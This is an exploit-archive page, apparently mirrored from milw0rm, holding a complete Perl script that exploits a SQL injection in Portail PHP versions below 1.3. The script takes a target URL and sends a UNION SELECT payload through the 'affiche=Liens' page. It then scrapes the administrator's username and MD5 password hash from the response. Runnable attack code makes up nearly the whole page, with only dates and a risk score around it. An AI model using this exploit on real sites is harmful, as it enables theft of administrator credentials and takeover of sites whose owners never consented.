Portail PHP < 1.3 SQL Injection Exploit

🗓️ 06 Jun 2005 00:00:00Reported by RootType

SQL Injection exploit for Portail PHP < 1.3, reveals admin username and MD5 hashed passwor


                                                #!/usr/bin/perl -w
#
# SQL Injection Exploit for Portail PHP &lt; 1.3
# This exploit show the username of the administrator of the portal and his password crypted in MD5
# Related advisory: http://www.securityfocus.com/archive/1/398728/2005-05-21/2005-05-27/0
# Coded by Alberto Trivero

use LWP::Simple;

print &quot;\n\t=================================\n&quot;;
print &quot;\t= Exploit for Portail PHP &lt; 1.3 =\n&quot;;
print &quot;\t= Alberto Trivero - codebug.org =\n&quot;;
print &quot;\t=================================\n\n&quot;;

if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
   print &quot;Usage:\nperl $0 [full_target_path]\n\n&quot;;
   print &quot;Examples:\nperl $0 http://www.example.com/portailphp/\n&quot;;
   exit(0);
}

$url=q[index.php?affiche=Liens&amp;id=1%20UNION%20SELECT%20null,null,null,null,null,null,US_pwd,US_nom,null%20FROM%20pphp_user/*];
$page=get($ARGV[0].$url) || die &quot;[-] Unable to retrieve: $!&quot;;
print &quot;[+] Connected to: $ARGV[0]\n&quot;;
$page=~m/0000-00-00, 0  \)&lt;\/i&gt;     &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;\/td&gt;   &lt;\/tr&gt;   &lt;tr&gt;     &lt;td width='100%'&gt;(.*?)&lt;\/td&gt;   &lt;\/tr&gt;/ &amp;&amp; print &quot;[+] Username of administrator is: $1\n&quot;;
print &quot;[-] Unable to retrieve username\n&quot; if(!$1);
$page=~m/&lt;img border='0' src='\.\/images\/ico_liens\.gif' &gt;&amp;nbsp;&lt;b&gt; &lt;\/b&gt;: (.*?)&lt;\/td&gt;/ &amp;&amp; print &quot;[+] MD5 hash of password is: $1\n&quot;;
print &quot;[-] Unable to retrieve hash of password\n&quot; if(!$1);

# milw0rm.com [2005-06-06]

06 Jun 2005 00:00Current

7.1High risk

Vulners AI Score7.1

Portail PHP &lt; 1.3 SQL Injection Exploit

Portail PHP < 1.3 SQL Injection Exploit